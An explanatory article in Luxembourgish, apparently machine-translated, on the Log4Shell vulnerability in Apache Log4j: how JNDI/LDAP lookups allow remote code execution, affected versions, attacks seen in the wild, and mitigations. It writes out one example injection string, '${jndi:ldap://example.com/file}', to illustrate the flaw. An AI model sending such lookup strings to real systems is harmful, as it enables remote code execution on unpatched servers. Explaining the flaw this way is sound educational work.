Inhaltsverzeechnes[Verstoppen][Show]
Enn November 2021 hu mir eng grouss Bedrohung fir d'Cybersécherheet entdeckt. Dës Ausbeutung géif potenziell Millioune Computersystemer weltwäit beaflossen.
Dëst ass e Guide iwwer d'Log4j Schwachstelle a wéi e ignoréierten Designfehler iwwer 90% vun de Computerservicer op der Welt opgemaach huet fir Attacken.
Apache Log4j ass en Open-Source Java-baséiert Logging Utility entwéckelt vun der Apache Software Foundation. Ursprénglech geschriwwen vum Ceki Gülcü am 2001, ass et elo Deel vun Apache Logging Services, e Projet vun der Apache Software Foundation.
Firmen ronderëm d'Welt benotzen d'Log4j-Bibliothéik fir d'Aloggen op hir Uwendungen z'erméiglechen. Tatsächlech ass d'Java Bibliothéik sou ubiquitär, Dir kënnt et an Uwendungen vun Amazon, Microsoft, Google a méi fannen.
D'Prominenz vun der Bibliothéik bedeit datt all potenziell Mängel am Code Millioune Computeren opmaachen fir Hacking. Den 24. November 2021, a Cloud Sécherheet Fuerscher, déi fir Alibaba schafft, entdeckt e schreckleche Feeler.
D'Log4j Schwachstelle, och bekannt als Log4Shell, existéiert onnotéiert zënter 2013. D'Schwachheet erlaabt béiswëlleg Akteuren Code op betroffene Systemer ze lafen déi Log4j lafen. Et gouf den 9. Dezember 2021 ëffentlech verëffentlecht
Industriesexperten nennen de Log4Shell Feeler den gréisste Schwachstelle an der rezenter Erënnerung.
An der Woch no der Verëffentlechung vun der Schwachstelle hunn Cybersecurity Teams Millioune Attacke festgestallt. E puer Fuerscher hunn souguer en Taux vun iwwer honnert Attacke pro Minutt observéiert.
Wéi heescht et schaffen?
Fir ze verstoen firwat Log4Shell sou geféierlech ass, musse mir verstoen wat et fäeg ass.
D'Log4Shell Schwachstelle erlaabt eng arbiträr Code Ausféierung, wat am Fong bedeit datt en Ugräifer all Kommando oder Code op enger Zilmaschinn ausféiere kann.
Wéi mécht et dëst?
Als éischt musse mir verstoen wat de JNDI ass.
D'Java Naming and Directory Interface (JNDI) ass e Java Service deen Java Programmer erlaabt Daten a Ressourcen iwwer e Numm z'entdecken an nozekucken. Dës Verzeechnesservicer si wichteg well se en organiséierte Set vu Rekorder ubidden fir Entwéckler einfach ze referenzéieren wann se Uwendungen kreéieren.
De JNDI ka verschidde Protokoller benotzen fir Zougang zu engem bestëmmte Verzeechnes ze kréien. Ee vun dëse Protokoller ass de Lightweight Directory Access Protocol, oder LDAP.
Wann Dir e String protokolléiert, log4j mécht String Auswiesselungen wann se Ausdréck vun der Form begéinen ${prefix:name}
.
Zum Beispill, Text: ${java:version}
kéint als Text protokolléiert ginn: Java Versioun 1.8.0_65. Dës Zorte vun Auswiesselungen sinn allgemeng.
Mir kënnen och Ausdréck wéi z Text: ${jndi:ldap://example.com/file}
deen den JNDI System benotzt fir e Java Objet vun enger URL duerch de LDAP Protokoll ze lueden.
Dëst lued effektiv d'Donnéeën aus där URL an d'Maschinn. All potenziell Hacker kann béiswëlleg Code op enger ëffentlecher URL hosten a waarden op Maschinnen déi Log4j benotzen fir se ze protokolléieren.
Zënter datt den Inhalt vu Log-Messagen Benotzer-kontrolléiert Daten enthalen, kënnen Hacker hir eege JNDI-Referenzen aginn, déi op LDAP-Server weisen, déi se kontrolléieren. Dës LDAP-Server kënne voller béiswëlleg Java-Objete sinn, déi de JNDI duerch d'Schwachstelle kann ausféieren.
Wat dëst méi schlëmm mécht ass datt et egal ass ob d'Applikatioun eng Server-Säit oder eng Client-Säit Applikatioun ass.
Soulaang et e Wee gëtt fir de Logger de béisaarteg Code vum Ugräifer ze liesen, ass d'Applikatioun nach ëmmer op fir Ausnotzen.
Wien gëtt betraff?
D'Schwachheet beaflosst all Systemer a Servicer déi APache Log4j benotzen, mat Versiounen 2.0 bis 2.14.1.
Verschidde Sécherheetsexperten roden datt d'Schwachheet eng Zuel vun Uwendungen mat Java beaflosse kann.
De Feeler gouf fir d'éischt am Microsoft Besëtzer Minecraft Videospill entdeckt. Microsoft huet hir Benotzer gefuerdert hir Java Editioun Minecraft Software ze upgraden fir all Risiko ze vermeiden.
Jen Easterly, den Direkter vun der Cybersecurity and Infrastructure Security Agency (CISA) seet datt d'Verkeefer eng grouss Verantwortung fir Ennbenotzer vu béiswëllegen Akteuren ze verhënneren, déi dës Schwachstelle ausnotzen.
"Verkeefer sollen och mat hire Clienten kommunizéieren fir datt d'Endbenotzer wëssen datt hire Produkt dës Schwachstelle enthält a solle Softwareupdates prioritär stellen."
D'Attacke solle scho ugefaang hunn. Symantec, eng Firma déi Cybersecurity Software ubitt, huet eng variéiert Unzuel vun Attacken Ufroen observéiert.
Hei sinn e puer Beispiller vun den Aarte vun Attacken déi Fuerscher festgestallt hunn:
- botnets
Botnets sinn e Netzwierk vu Computeren déi ënner der Kontroll vun enger eenzeger attackéierter Partei sinn. Si hëllefen DDoS Attacken auszeféieren, Daten ze klauen an aner Scams. D'Fuerscher hunn de Muhstik Botnet a Shell-Skripte observéiert, déi vum Log4j Exploit erofgeluede goufen.
- XMRig Miner Trojanesche
XMRig ass en Open-Source cryptocurrency Miner deen CPUs benotzt fir de Monero Token ze minen. Cyberkriminelle kënnen XMRig op Apparater vun de Leit installéieren, sou datt se hir Veraarbechtungskraaft ouni hir Wësse benotze kënnen.
- Khonsari Ransomware
Ransomware bezitt sech op eng Form vu Malware entwéckelt fir verschlëssele Fichieren op engem Computer. Ugräifer kënnen dann d'Bezuelung verlaangen am Austausch fir Zougang zu de verschlësselte Dateien zréckzekommen. Fuerscher hunn d'Khonsari Ransomware a Log4Shell Attacken entdeckt. Si zielen op Windows Server a benotzen den .NET Kader.
Wat geschitt duerno?
Experten viraussoen datt et Méint oder vläicht souguer Joere ka daueren fir de Chaos komplett ze fixéieren, deen duerch d'Log4J Schwachstelle gefouert gëtt.
Dëse Prozess beinhalt d'Aktualiséierung vun all betraffene System mat enger patched Versioun. Och wann all dës Systemer gefléckt sinn, ass et nach ëmmer déi dreiwend Bedrohung vu méigleche Backdoors, déi Hacker scho vläicht an d'Fënster bäigefüügt hunn, datt d'Server fir Attack opgemaach hunn.
vill Léisungen a Mitigungen existéieren fir ze verhënneren datt Uwendungen vun dësem Feeler exploitéiert ginn. Déi nei Log4j Versioun 2.15.0-rc1 huet verschidde Astellunge geännert fir dës Schwachstelle ze reduzéieren.
All Fonctiounen déi JNDI benotzen, ginn als Standard behënnert an d'Remote Lookups goufen och limitéiert. Desaktivéiere vun der Lookup Feature op Ärem Log4j Setup hëlleft de Risiko vu méiglechen Ausnotzen ze reduzéieren.
Ausserhalb Log4j gëtt et nach ëmmer de Besoin fir e méi breede Plang fir Open-Source Exploiten ze vermeiden.
Fréier am Mee huet d'Wäiss Haus en exekutiv Uerdnung déi als Zil huet d'national Cybersécherheet ze verbesseren. Et enthält eng Bestëmmung fir eng Software Bill of Materials (SBOM) déi am Wesentlechen e formell Dokument war dat eng Lëscht vun all Element enthält fir d'Applikatioun ze bauen.
Dëst beinhalt Deeler wéi de Open Source Packagen, Ofhängegkeeten an APIe fir Entwécklung benotzt. Och wann d'Iddi vu SBOMs hëllefräich ass fir Transparenz, wäert et wierklech dem Konsument hëllefen?
D'Upgrade vun Ofhängegkeeten kann ze vill Stress sinn. Firme kënne just wielen fir Geldstrofen ze bezuelen anstatt extra Zäit ze verschwenden fir alternativ Packagen ze fannen. Vläicht dës SBOMs wäert nëmme nëtzlech sinn wann hir Ëmfang ass weider limitéiert.
Konklusioun
De Log4j Thema ass méi wéi nëmmen en technesche Problem fir Organisatiounen.
Geschäftsleit musse sech vu potenzielle Risiken bewosst sinn, déi kéinte geschéien wann hir Serveren, Produkter oder Servicer op Code vertrauen, dee se selwer net erhalen.
Vertrauen op Open Source an Drëtt Partei Uwendungen kënnt ëmmer mat e puer Risiko. Firme solle betruechten d'Risikomitigatiounsstrategien auszeschaffen ier nei Bedrohungen un d'Liicht kommen.
Vill vum Web hänkt op Open-Source Software, déi vun Dausende vu Fräiwëlleger weltwäit erhale gëtt.
Wa mir de Web eng sécher Plaz wëllen halen, solle Regierungen a Firmen investéieren an d'Finanzéierung vun Open Source Efforten an Cybersecurity Agenturen wéi z. CISA.
Hannerlooss eng Äntwert